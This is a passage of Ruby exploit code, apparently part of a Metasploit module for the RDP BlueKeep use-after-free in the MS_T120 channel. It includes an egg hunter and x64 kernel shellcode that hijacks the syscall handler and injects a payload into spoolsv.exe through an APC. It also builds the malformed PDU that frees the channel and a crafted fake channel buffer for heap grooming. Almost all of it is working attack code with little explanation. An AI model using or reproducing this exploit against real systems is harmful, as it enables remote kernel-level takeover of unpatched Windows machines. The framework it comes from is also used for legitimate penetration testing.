 343 |         raise "Unknown symbol '#{target}' while resolving relative offsets"
 344 |       end
 345 |     end
 346 |     encoded.fill
 347 |     encoded.data
 348 |   end
 349 | 
 350 |   # The user mode payload has two parts. The first is an egg hunter that searches for
 351 |   # the kernel mode payload. The second part is the actual payload that's invoked in
 352 |   # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel
 353 |   # and user mode payloads around the heap in different packets because we don't have
 354 |   # enough space to put them both in the same chunk. Given that code exec can result in
 355 |   # landing on the user land payload, the egg is used to go to a kernel payload.
 356 |   def user_mode_payload
 357 | 
 358 |     asm = %Q^
 359 | _start:
 360 |     lea rcx, [rel _start]
 361 |     mov r8, 0x#{KERNELMODE_EGG.to_s(16)}
 362 | _egg_loop:
 363 |     sub rcx, 0x#{CHUNK_SIZE.to_s(16)}
 364 |     sub rax, 0x#{CHUNK_SIZE.to_s(16)}
 365 |     mov rdx, [rcx - 8]
 366 |     cmp rdx, r8
 367 |     jnz _egg_loop
 368 |     jmp rcx
 369 |     ^
 370 |     egg_loop = assemble_with_fixups(asm)
 371 | 
 372 |     # The USERMODE_EGG is required at the start as well, because the exploit code
 373 |     # assumes the tag is there, and jumps over it to find the shellcode.
 374 |     [
 375 |       USERMODE_EGG,
 376 |       egg_loop,
 377 |       USERMODE_EGG,
 378 |       payload.raw
 379 |     ].pack('<Qa*<Qa*')
 380 |   end
 381 | 
 382 |   def kernel_mode_payload
 383 | 
 384 |     # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
 385 |     #
 386 |     # This shellcode was written originally for eternalblue exploits
 387 |     # eternalblue_exploit7.py and eternalblue_exploit8.py
 388 |     #
 389 |     # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
 390 |     #
 391 |     # Note:
 392 |     # - The userland shellcode is run in a new thread of system process.
 393 |     #     If userland shellcode causes any exception, the system process get killed.
 394 |     # - On idle target with multiple core processors, the hijacked system call
 395 |     #     might take a while (> 5 minutes) to get called because the system
 396 |     #     call may be called on other processors.
 397 |     # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.
 398 |     #     This is ok because some Windows functions do not require a shadow stack.
 399 |     # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
 400 |     #     Note: the Windows 8 version macros are removed below
 401 |     # - The userland payload MUST be appened to this shellcode.
 402 |     #
 403 |     # References:
 404 |     # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
 405 |     # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
 406 | 
 407 |     data_kapc_offset           = 0x10
 408 |     data_nt_kernel_addr_offset = 0x8
 409 |     data_origin_syscall_offset = 0
 410 |     data_peb_addr_offset       = -0x10
 411 |     data_queueing_kapc_offset  = -0x8
 412 |     hal_heap_storage           = 0xffffffffffd04100
 413 | 
 414 |     # These hashes are not the same as the ones used by the
 415 |     # Block API so they have to be hard-coded.
 416 |     createthread_hash              = 0x835e515e
 417 |     keinitializeapc_hash           = 0x6d195cc4
 418 |     keinsertqueueapc_hash          = 0xafcc4634
 419 |     psgetcurrentprocess_hash       = 0xdbf47c78
 420 |     psgetprocessid_hash            = 0x170114e1
 421 |     psgetprocessimagefilename_hash = 0x77645f3f
 422 |     psgetprocesspeb_hash           = 0xb818b848
 423 |     psgetthreadteb_hash            = 0xcef84c3e
 424 |     spoolsv_exe_hash               = 0x3ee083d8
 425 |     zwallocatevirtualmemory_hash   = 0x576e99ea
 426 | 
 427 |     asm = %Q^
 428 | shellcode_start:
 429 |     nop
 430 |     nop
 431 |     nop
 432 |     nop
 433 |     ; IRQL is DISPATCH_LEVEL when got code execution
 434 | 
 435 |     push rbp
 436 | 
 437 |     call set_rbp_data_address_fn
 438 | 
 439 |     ; read current syscall
 440 |     mov ecx, 0xc0000082
 441 |     rdmsr
 442 |     ; do NOT replace saved original syscall address with hook syscall
 443 |     lea r9, [rel syscall_hook]
 444 |     cmp eax, r9d
 445 |     je _setup_syscall_hook_done
 446 | 
 447 |     ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
 448 |     cmp dword [rbp+#{data_origin_syscall_offset}], eax
 449 |     je _hook_syscall
 450 | 
 451 |     ; save original syscall
 452 |     mov dword [rbp+#{data_origin_syscall_offset}+4], edx
 453 |     mov dword [rbp+#{data_origin_syscall_offset}], eax
 454 | 
 455 |     ; first time on the target
 456 |     mov byte [rbp+#{data_queueing_kapc_offset}], 0
 457 | 
 458 | _hook_syscall:
 459 |     ; set a new syscall on running processor
 460 |     ; setting MSR 0xc0000082 affects only running processor
 461 |     xchg r9, rax
 462 |     push rax
 463 |     pop rdx     ; mov rdx, rax
 464 |     shr rdx, 32
 465 |     wrmsr
 466 | 
 467 | _setup_syscall_hook_done:
 468 |     pop rbp
 469 | 
 470 | ;--------------------- HACK crappy thread cleanup --------------------
 471 | ; This code is effectively the same as the epilogue of the function that calls
 472 | ; the vulnerable function in the kernel, with a tweak or two.
 473 | 
 474 |     ; TODO: make the lock not suck!!
 475 |     mov     rax, qword [gs:0x188]
 476 |     add     word [rax+0x1C4], 1       ; KeGetCurrentThread()->KernelApcDisable++
 477 |     lea     r11, [rsp+0b8h]
 478 |     xor     eax, eax
 479 |     mov     rbx, [r11+30h]
 480 |     mov     rbp, [r11+40h]
 481 |     mov     rsi, [r11+48h]
 482 |     mov     rsp, r11
 483 |     pop     r15
 484 |     pop     r14
 485 |     pop     r13
 486 |     pop     r12
 487 |     pop     rdi
 488 |     ret
 489 | 
 490 | ;--------------------- END HACK crappy thread cleanup
 491 | 
 492 | ;========================================================================
 493 | ; Find memory address in HAL heap for using as data area
 494 | ; Return: rbp = data address
 495 | ;========================================================================
 496 | set_rbp_data_address_fn:
 497 |     ; On idle target without user application, syscall on hijacked processor might not be called immediately.
 498 |     ; Find some address to store the data, the data in this address MUST not be modified
 499 |     ;   when exploit is rerun before syscall is called
 500 |     ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
 501 | 
 502 |     ; ------ HACK rbp wasnt valid!
 503 | 
 504 |     mov rbp, #{hal_heap_storage}    ; TODO: use some other buffer besides HAL heap??
 505 | 
 506 |     ; --------- HACK end rbp
 507 | 
 508 | _set_rbp_data_address_fn_next:
 509 |     ;shr rbp, 12
 510 |     ;shl rbp, 12
 511 |     ;sub rbp, 0x70   ; for KAPC struct too
 512 |     ret
 513 | 
 514 |     ;int 3
 515 |     ;call $+5
 516 |     ;pop r13
 517 | syscall_hook:
 518 |     swapgs
 519 |     mov qword [gs:0x10], rsp
 520 |     mov rsp, qword [gs:0x1a8]
 521 |     push 0x2b
 522 |     push qword [gs:0x10]
 523 | 
 524 |     push rax    ; want this stack space to store original syscall addr
 525 |     ; save rax first to make this function continue to real syscall
 526 |     push rax
 527 |     push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
 528 |     call set_rbp_data_address_fn
 529 |     mov rax, [rbp+#{data_origin_syscall_offset}]
 530 |     add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
 531 |     mov [rsp+0x10], rax
 532 | 
 533 |     ; save all volatile registers
 534 |     push rcx
 535 |     push rdx
 536 |     push r8
 537 |     push r9
 538 |     push r10
 539 |     push r11
 540 | 
 541 |     ; use lock cmpxchg for queueing APC only one at a time
 542 |     xor eax, eax
 543 |     mov dl, 1
 544 |     lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl
 545 |     jnz _syscall_hook_done
 546 | 
 547 |     ;======================================
 548 |     ; restore syscall
 549 |     ;======================================
 550 |     ; an error after restoring syscall should never occur
 551 |     mov ecx, 0xc0000082
 552 |     mov eax, [rbp+#{data_origin_syscall_offset}]
 553 |     mov edx, [rbp+#{data_origin_syscall_offset}+4]
 554 |     wrmsr
 555 | 
 556 |     ; allow interrupts while executing shellcode
 557 |     sti
 558 |     call r3_to_r0_start
 559 |     cli
 560 | 
 561 | _syscall_hook_done:
 562 |     pop r11
 563 |     pop r10
 564 |     pop r9
 565 |     pop r8
 566 |     pop rdx
 567 |     pop rcx
 568 |     pop rbp
 569 |     pop rax
 570 |     ret
 571 | 
 572 | r3_to_r0_start:
 573 |     ; save used non-volatile registers
 574 |     push r15
 575 |     push r14
 576 |     push rdi
 577 |     push rsi
 578 |     push rbx
 579 |     push rax    ; align stack by 0x10
 580 | 
 581 |     ;======================================
 582 |     ; find nt kernel address
 583 |     ;======================================
 584 |     mov r15, qword [rbp+#{data_origin_syscall_offset}]      ; KiSystemCall64 is an address in nt kernel
 585 |     shr r15, 0xc                ; strip to page size
 586 |     shl r15, 0xc
 587 | 
 588 | _x64_find_nt_walk_page:
 589 |     sub r15, 0x1000             ; walk along page size
 590 |     cmp word [r15], 0x5a4d      ; 'MZ' header
 591 |     jne _x64_find_nt_walk_page
 592 | 
 593 |     ; save nt address for using in KernelApcRoutine
 594 |     mov [rbp+#{data_nt_kernel_addr_offset}], r15
 595 | 
 596 |     ;======================================
 597 |     ; get current EPROCESS and ETHREAD
 598 |     ;======================================
 599 |     mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
 600 |     mov edi, #{psgetcurrentprocess_hash}
 601 |     call win_api_direct
 602 |     xchg rcx, rax       ; rcx = EPROCESS
 603 | 
 604 |     ; r15 : nt kernel address
 605 |     ; r14 : ETHREAD
 606 |     ; rcx : EPROCESS
 607 | 
 608 |     ;======================================
 609 |     ; find offset of EPROCESS.ImageFilename
 610 |     ;======================================
 611 |     mov edi, #{psgetprocessimagefilename_hash}
 612 |     call get_proc_addr
 613 |     mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
 614 |     mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename
 615 | 
 616 | 
 617 |     ;======================================
 618 |     ; find offset of EPROCESS.ThreadListHead
 619 |     ;======================================
 620 |     ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
 621 |     ; if offset of ImageFilename is more than 0x400, current is (Win8+)
 622 | 
 623 |     cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
 624 |     jb _find_eprocess_threadlist_offset_win7
 625 |     add eax, 0x10
 626 | _find_eprocess_threadlist_offset_win7:
 627 |     lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
 628 | 
 629 |     ;======================================
 630 |     ; find offset of ETHREAD.ThreadListEntry
 631 |     ;======================================
 632 | 
 633 |     lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
 634 |     mov r9, r8
 635 | 
 636 |     ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
 637 | _find_ethread_threadlist_offset_loop:
 638 |     mov r9, qword [r9]
 639 | 
 640 |     cmp r8, r9          ; check end of list
 641 |     je _insert_queue_apc_done    ; not found !!!
 642 | 
 643 |     ; if (r9 - r14 < 0x700) found
 644 |     mov rax, r9
 645 |     sub rax, r14
 646 |     cmp rax, 0x700
 647 |     ja _find_ethread_threadlist_offset_loop
 648 |     sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)
 649 | 
 650 | 
 651 |     ;======================================
 652 |     ; find offset of EPROCESS.ActiveProcessLinks
 653 |     ;======================================
 654 |     mov edi, #{psgetprocessid_hash}
 655 |     call get_proc_addr
 656 |     mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
 657 |     add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
 658 | 
 659 | 
 660 |     ;======================================
 661 |     ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
 662 |     ;======================================
 663 |     ; check process name
 664 | 
 665 | 
 666 |     xor eax, eax      ; HACK to exit earlier if process not found
 667 | 
 668 | _find_target_process_loop:
 669 |     lea rsi, [rcx+rbx]
 670 | 
 671 |     push rax
 672 |     call calc_hash
 673 |     cmp eax, #{spoolsv_exe_hash}  ; "spoolsv.exe"
 674 |     pop rax
 675 |     jz found_target_process
 676 | 
 677 | ;---------- HACK PROCESS NOT FOUND start -----------
 678 |     inc rax
 679 |     cmp rax, 0x300      ; HACK not found!
 680 |     jne _next_find_target_process
 681 |     xor ecx, ecx
 682 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
 683 |     mov byte [rbp+#{data_queueing_kapc_offset}], cl
 684 | 
 685 |     jmp _r3_to_r0_done
 686 | 
 687 | ;---------- HACK PROCESS NOT FOUND end -----------
 688 | 
 689 | _next_find_target_process:
 690 |     ; next process
 691 |     mov rcx, [rcx+rdi]
 692 |     sub rcx, rdi
 693 |     jmp _find_target_process_loop
 694 | 
 695 | 
 696 | found_target_process:
 697 |     ; The allocation for userland payload will be in KernelApcRoutine.
 698 |     ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
 699 | 
 700 |     ;======================================
 701 |     ; save process PEB for finding CreateThread address in kernel KAPC routine
 702 |     ;======================================
 703 |     mov edi, #{psgetprocesspeb_hash}
 704 |     ; rcx is EPROCESS. no need to set it.
 705 |     call win_api_direct
 706 |     mov [rbp+#{data_peb_addr_offset}], rax
 707 | 
 708 | 
 709 |     ;======================================
 710 |     ; iterate ThreadList until KeInsertQueueApc() success
 711 |     ;======================================
 712 |     ; r15 = nt
 713 |     ; r14 = -(offset of ETHREAD.ThreadListEntry)
 714 |     ; rcx = EPROCESS
 715 |     ; edx = offset of EPROCESS.ThreadListHead
 716 | 
 717 | 
 718 |     lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
 719 |     mov rbx, rsi    ; use rbx for iterating thread
 720 | 
 721 |     ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
 722 |     ; Moreover, alertable thread need to be waiting state which is more difficult to check.
 723 |     ; try queueing APC then check KAPC member is more reliable.
 724 | 
 725 | _insert_queue_apc_loop:
 726 |     ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
 727 |     mov rbx, [rbx+8]
 728 | 
 729 |     cmp rsi, rbx
 730 |     je _insert_queue_apc_loop   ; skip list head
 731 | 
 732 |     ; find start of ETHREAD address
 733 |     ; set it to rdx to be used for KeInitializeApc() argument too
 734 |     lea rdx, [rbx + r14]    ; ETHREAD
 735 | 
 736 |     ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
 737 |     ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
 738 |     ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
 739 |     ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
 740 |     ; Teb member is next to Queue member.
 741 |     mov edi, #{psgetthreadteb_hash}
 742 |     call get_proc_addr
 743 |     mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
 744 |     cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
 745 |     je _insert_queue_apc_loop
 746 | 
 747 |     ; KeInitializeApc(PKAPC,
 748 |     ;                 PKTHREAD,
 749 |     ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
 750 |     ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
 751 |     ;                 PKRUNDOWN_ROUTINE = NULL,
 752 |     ;                 PKNORMAL_ROUTINE = userland_shellcode,
 753 |     ;                 KPROCESSOR_MODE = UserMode (1),
 754 |     ;                 PVOID Context);
 755 |     lea rcx, [rbp+#{data_kapc_offset}]     ; PAKC
 756 |     xor r8, r8      ; OriginalApcEnvironment
 757 |     lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
 758 |     push rbp    ; context
 759 |     push 1      ; UserMode
 760 |     push rbp    ; userland shellcode (MUST NOT be NULL)
 761 |     push r8     ; NULL
 762 |     sub rsp, 0x20   ; shadow stack
 763 |     mov edi, #{keinitializeapc_hash}
 764 |     call win_api_direct
 765 |     ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
 766 | 
 767 |     ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
 768 |     ;   SystemArgument1 is second argument in usermode code (rdx)
 769 |     ;   SystemArgument2 is third argument in usermode code (r8)
 770 |     lea rcx, [rbp+#{data_kapc_offset}]
 771 |     ;xor edx, edx   ; no need to set it here
 772 |     ;xor r8, r8     ; no need to set it here
 773 |     xor r9, r9
 774 |     mov edi, #{keinsertqueueapc_hash}
 775 |     call win_api_direct
 776 |     add rsp, 0x40
 777 |     ; if insertion failed, try next thread
 778 |     test eax, eax
 779 |     jz _insert_queue_apc_loop
 780 | 
 781 |     mov rax, [rbp+#{data_kapc_offset}+0x10]     ; get KAPC.ApcListEntry
 782 |     ; EPROCESS pointer 8 bytes
 783 |     ; InProgressFlags 1 byte
 784 |     ; KernelApcPending 1 byte
 785 |     ; if success, UserApcPending MUST be 1
 786 |     cmp byte [rax+0x1a], 1
 787 |     je _insert_queue_apc_done
 788 | 
 789 |     ; manual remove list without lock
 790 |     mov [rax], rax
 791 |     mov [rax+8], rax
 792 |     jmp _insert_queue_apc_loop
 793 | 
 794 | _insert_queue_apc_done:
 795 |     ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
 796 | 
 797 | _r3_to_r0_done:
 798 |     pop rax
 799 |     pop rbx
 800 |     pop rsi
 801 |     pop rdi
 802 |     pop r14
 803 |     pop r15
 804 |     ret
 805 | 
 806 | ;========================================================================
 807 | ; Call function in specific module
 808 | ;
 809 | ; All function arguments are passed as calling normal function with extra register arguments
 810 | ; Extra Arguments: r15 = module pointer
 811 | ;                  edi = hash of target function name
 812 | ;========================================================================
 813 | win_api_direct:
 814 |     call get_proc_addr
 815 |     jmp rax
 816 | 
 817 | 
 818 | ;========================================================================
 819 | ; Get function address in specific module
 820 | ;
 821 | ; Arguments: r15 = module pointer
 822 | ;            edi = hash of target function name
 823 | ; Return: eax = offset
 824 | ;========================================================================
 825 | get_proc_addr:
 826 |     ; Save registers
 827 |     push rbx
 828 |     push rcx
 829 |     push rsi                ; for using calc_hash
 830 | 
 831 |     ; use rax to find EAT
 832 |     mov eax, dword [r15+60]  ; Get PE header e_lfanew
 833 |     mov eax, dword [r15+rax+136] ; Get export tables RVA
 834 | 
 835 |     add rax, r15
 836 |     push rax                 ; save EAT
 837 | 
 838 |     mov ecx, dword [rax+24]  ; NumberOfFunctions
 839 |     mov ebx, dword [rax+32]  ; FunctionNames
 840 |     add rbx, r15
 841 | 
 842 | _get_proc_addr_get_next_func:
 843 |     ; When we reach the start of the EAT (we search backwards), we hang or crash
 844 |     dec ecx                     ; decrement NumberOfFunctions
 845 |     mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
 846 |     add rsi, r15                ; Add the modules base address
 847 | 
 848 |     call calc_hash
 849 | 
 850 |     cmp eax, edi                        ; Compare the hashes
 851 |     jnz _get_proc_addr_get_next_func    ; try the next function
 852 | 
 853 | _get_proc_addr_finish:
 854 |     pop rax                     ; restore EAT
 855 |     mov ebx, dword [rax+36]
 856 |     add rbx, r15                ; ordinate table virtual address
 857 |     mov cx, word [rbx+rcx*2]    ; desired functions ordinal
 858 |     mov ebx, dword [rax+28]     ; Get the function addresses table rva
 859 |     add rbx, r15                ; Add the modules base address
 860 |     mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
 861 |     add rax, r15                ; Add the modules base address to get the functions actual VA
 862 | 
 863 |     pop rsi
 864 |     pop rcx
 865 |     pop rbx
 866 |     ret
 867 | 
 868 | ;========================================================================
 869 | ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
 870 | ;
 871 | ; Argument: rsi = string to hash
 872 | ; Clobber: rsi
 873 | ; Return: eax = hash
 874 | ;========================================================================
 875 | calc_hash:
 876 |     push rdx
 877 |     xor eax, eax
 878 |     cdq
 879 | _calc_hash_loop:
 880 |     lodsb                   ; Read in the next byte of the ASCII string
 881 |     ror edx, 13             ; Rotate right our hash value
 882 |     add edx, eax            ; Add the next byte of the string
 883 |     test eax, eax           ; Stop when found NULL
 884 |     jne _calc_hash_loop
 885 |     xchg edx, eax
 886 |     pop rdx
 887 |     ret
 888 | 
 889 | 
 890 | ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
 891 | ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
 892 | ; Moreover, there is no lock when calling KernelApcRoutine.
 893 | ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
 894 | ;
 895 | ; VOID KernelApcRoutine(
 896 | ;           IN PKAPC Apc,
 897 | ;           IN PKNORMAL_ROUTINE *NormalRoutine,
 898 | ;           IN PVOID *NormalContext,
 899 | ;           IN PVOID *SystemArgument1,
 900 | ;           IN PVOID *SystemArgument2)
 901 | kernel_kapc_routine:
 902 |     push rbp
 903 |     push rbx
 904 |     push rdi
 905 |     push rsi
 906 |     push r15
 907 | 
 908 |     mov rbp, [r8]       ; *NormalContext is our data area pointer
 909 | 
 910 |     mov r15, [rbp+#{data_nt_kernel_addr_offset}]
 911 |     push rdx
 912 |     pop rsi     ; mov rsi, rdx
 913 |     mov rbx, r9
 914 | 
 915 |     ;======================================
 916 |     ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
 917 |     ;======================================
 918 |     xor eax, eax
 919 |     mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
 920 |     ; rdx is already address of baseAddr
 921 |     mov [rdx], rax      ; baseAddr = 0
 922 |     mov ecx, eax
 923 |     not rcx             ; ProcessHandle = -1
 924 |     mov r8, rax         ; ZeroBits
 925 |     mov al, 0x40    ; eax = 0x40
 926 |     push rax            ; PAGE_EXECUTE_READWRITE = 0x40
 927 |     shl eax, 6      ; eax = 0x40 << 6 = 0x1000
 928 |     push rax            ; MEM_COMMIT = 0x1000
 929 |     ; reuse r9 for address of RegionSize
 930 |     mov [r9], rax       ; RegionSize = 0x1000
 931 |     sub rsp, 0x20   ; shadow stack
 932 |     mov edi, #{zwallocatevirtualmemory_hash}
 933 |     call win_api_direct
 934 |     add rsp, 0x30
 935 | 
 936 |     ; check error
 937 |     test eax, eax
 938 |     jnz _kernel_kapc_routine_exit
 939 | 
 940 |     ;======================================
 941 |     ; copy userland payload
 942 |     ;======================================
 943 |     mov rdi, [rsi]
 944 | 
 945 | ;--------------------------- HACK IN EGG USER ---------
 946 | 
 947 |     push rdi
 948 | 
 949 |     lea rsi, [rel shellcode_start]
 950 |     mov rdi, 0x#{USERMODE_EGG.to_s(16)}
 951 | 
 952 |   _find_user_egg_loop:
 953 |       sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
 954 |       mov rax, [rsi - 8]
 955 |       cmp rax, rdi
 956 |       jnz _find_user_egg_loop
 957 | 
 958 |   _inner_find_user_egg_loop:
 959 |       inc rsi
 960 |       mov rax, [rsi - 8]
 961 |       cmp rax, rdi
 962 |       jnz _inner_find_user_egg_loop
 963 | 
 964 |     pop rdi
 965 | ;--------------------------- END HACK EGG USER ------------
 966 | 
 967 |     mov ecx, 0x380  ; fix payload size to 0x380 bytes
 968 | 
 969 |     rep movsb
 970 | 
 971 |     ;======================================
 972 |     ; find CreateThread address (in kernel32.dll)
 973 |     ;======================================
 974 |     mov rax, [rbp+#{data_peb_addr_offset}]
 975 |     mov rax, [rax + 0x18]       ; PEB->Ldr
 976 |     mov rax, [rax + 0x20]       ; InMemoryOrder list
 977 | 
 978 |     ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
 979 |     ;mov rbx, rsi    ; use rbx for iterating thread
 980 | _find_kernel32_dll_loop:
 981 |     mov rax, [rax]       ; first one always be executable
 982 |     ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
 983 |     ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
 984 |     ; offset 0x50  => is name
 985 |     ; offset 0x20  => is dllbase
 986 |     ;cmp word [rax+0x38], 0x40
 987 |     ;jne _find_kernel32_dll_loop
 988 |     cmp word [rax+0x48], 0x18
 989 |     jne _find_kernel32_dll_loop
 990 | 
 991 |     mov rdx, [rax+0x50]
 992 |     ; check only "32" because name might be lowercase or uppercase
 993 |     cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
 994 |     jnz _find_kernel32_dll_loop
 995 | 
 996 |     ;int3
 997 |     mov r15, [rax+0x20]
 998 |     mov edi, #{createthread_hash}
 999 |     call get_proc_addr
1000 | 
1001 |     ; save CreateThread address to SystemArgument1
1002 |     mov [rbx], rax
1003 | 
1004 | _kernel_kapc_routine_exit:
1005 |     xor ecx, ecx
1006 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
1007 |     mov byte [rbp+#{data_queueing_kapc_offset}], cl
1008 |     ; restore IRQL to APC_LEVEL
1009 |     mov cl, 1
1010 |     mov cr8, rcx
1011 | 
1012 |     pop r15
1013 |     pop rsi
1014 |     pop rdi
1015 |     pop rbx
1016 |     pop rbp
1017 |     ret
1018 | 
1019 | userland_start_thread:
1020 |     ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
1021 |     xchg rdx, rax   ; rdx is CreateThread address passed from kernel
1022 |     xor ecx, ecx    ; lpThreadAttributes = NULL
1023 |     push rcx        ; lpThreadId = NULL
1024 |     push rcx        ; dwCreationFlags = 0
1025 |     mov r9, rcx     ; lpParameter = NULL
1026 |     lea r8, [rel userland_payload]  ; lpStartAddr
1027 |     mov edx, ecx    ; dwStackSize = 0
1028 |     sub rsp, 0x20
1029 |     call rax
1030 |     add rsp, 0x30
1031 |     ret
1032 | 
1033 | userland_payload:
1034 |     ^
1035 | 
1036 |     [
1037 |       KERNELMODE_EGG,
1038 |       assemble_with_fixups(asm)
1039 |     ].pack('<Qa*')
1040 |   end
1041 | 
1042 |   def create_free_trigger(chan_user_id, chan_id)
1043 |     # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)
1044 |     vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")
1045 |     # The extra bytes on the end of the body is what causes the bad things to happen
1046 |     body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22
1047 |     rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)
1048 |   end
1049 | 
1050 |   def create_exploit_channel_buffer(target_addr)
1051 |     overspray_addr = target_addr + 0x2000
1052 |     shellcode_vtbl = target_addr + HEADER_SIZE
1053 |     magic_value1 = overspray_addr + 0x810
1054 |     magic_value2 = overspray_addr + 0x48
1055 |     magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE
1056 | 
1057 |     # first 0x38 bytes are used by DATA PDU packet
1058 |     # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE
1059 |     # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm
1060 |     [
1061 |       [
1062 |         # SystemResourceList (2 pointers, each 8 bytes)
1063 |         # Pointer to OWNER_ENTRY (8 bytes)
1064 |         # ActiveCount (SHORT, 2 bytes)
1065 |         # Flag (WORD, 2 bytes)
1066 |         # Padding (BYTE[4], 4 bytes) x64 only
1067 |         0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
1068 |         0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
1069 |         magic_value2, # OwnerThread (ULONG, 8 bytes)
1070 |         magic_value2, # TableSize (ULONG, 8 bytes)
1071 |         0x0, # ActiveEntries (DWORD, 4 bytes)
1072 |         0x0, # ContenttionCount (DWORD, 4 bytes)
1073 |         0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
1074 |         0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
1075 |         0x0, # Reserved2 (PVOID, 8 bytes) x64 only
1076 |         magic_value2, # Address (PVOID, 8 bytes)
1077 |         0x0, # SpinLock (UINT_PTR, 8 bytes)
1078 |       ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
1079 |       [
1080 |         magic_value2, # SystemResourceList (2 pointers, each 8 bytes)
1081 |         magic_value2, # --------------------
1082 |         0x0, # Pointer to OWNER_ENTRY (8 bytes)
1083 |         0x0, # ActiveCount (SHORT, 2 bytes)
1084 |         0x0, # Flag (WORD, 2 bytes)
1085 |         0x0, # Padding (BYTE[4], 4 bytes) x64 only
1086 |         0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
1087 |         0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
1088 |         magic_value2, # OwnerThread (ULONG, 8 bytes)
1089 |         magic_value2, # TableSize (ULONG, 8 bytes)
1090 |         0x0, # ActiveEntries (DWORD, 4 bytes)
1091 |         0x0, # ContenttionCount (DWORD, 4 bytes)
1092 |         0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
1093 |         0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
1094 |         0x0, # Reserved2 (PVOID, 8 bytes) x64 only
1095 |         magic_value2, # Address (PVOID, 8 bytes)
1096 |         0x0, # SpinLock (UINT_PTR, 8 bytes)
1097 |       ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
1098 |       [
1099 |         0x1F, # ClassOffset (DWORD, 4 bytes)
1100 |         0x0, # bindStatus (DWORD, 4 bytes)
1101 |         0x72, # lockCount1 (QWORD, 8 bytes)
1102 |         magic_value3, # connection (QWORD, 8 bytes)
1103 |         shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)
1104 |         0x5, # channelClass (DWORD, 4 bytes)
1105 |         "MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes)
1106 |         0x1F, # channelIndex (DWORD, 4 bytes)
1107 |         magic_value1, # channels (QWORD, 8 bytes)
